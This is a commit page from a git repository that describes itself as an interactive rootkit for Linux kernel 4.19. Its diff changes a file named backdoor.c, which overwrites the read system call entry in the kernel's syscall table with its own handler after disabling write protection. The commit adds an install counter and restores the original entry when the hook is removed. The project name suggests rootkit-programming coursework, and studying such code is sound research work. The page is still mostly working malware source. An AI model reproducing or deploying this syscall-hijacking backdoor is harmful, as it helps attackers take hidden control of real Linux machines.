linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit b19cc27f9a6cafa8c41ac305443837f10a4d3007
parent 710e182d6e60a347d80e604f5adae38fe9c782ee
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 29 Nov 2020 18:25:38 +0100

Merge branch 'master' of github.com:deurzen/rootkit-programming-dev

Diffstat:

Msrc/backdoor.c | 28+++++++++++++++++-----------


1 file changed, 17 insertions(+), 11 deletions(-)

diff --git a/src/backdoor.c b/src/backdoor.c
@@ -16,9 +16,11 @@ int (*current_receive_buf2)(struct tty_struct *, const unsigned char *, char *, 
 void
 backdoor_read(void)
 {
-    disable_protection();
-    sys_calls[__NR_read] = (void *)g7_read;
-    enable_protection();
+    if (atomic_inc_return(&read_install_count) == 1) {
+        disable_protection();
+        sys_calls[__NR_read] = (void *)g7_read;
+        enable_protection();
+    }
 }
 
 void
@@ -54,16 +56,20 @@ unbackdoor(void)
         tty = NULL;
     }
 
-    if (sys_read) {
-        disable_protection();
-        sys_calls[__NR_read] = (void *)sys_read;
-        enable_protection();
+    if (atomic_dec_return(&read_install_count) < 0) {
+        atomic_set(&read_install_count, 0);
+
+        if (sys_read) {
+            disable_protection();
+            sys_calls[__NR_read] = (void *)sys_read;
+            enable_protection();
 
-        int cur;
+            int cur;
 
-        while ((cur = atomic_read(&read_count)) > 0) {
-            DEBUG_INFO("Waiting for %d tasks", cur);
-            msleep(250);
+            while ((cur = atomic_read(&read_count)) > 0) {
+                DEBUG_INFO("Waiting for %d tasks", cur);
+                msleep(250);
+            }
         }
     }
 }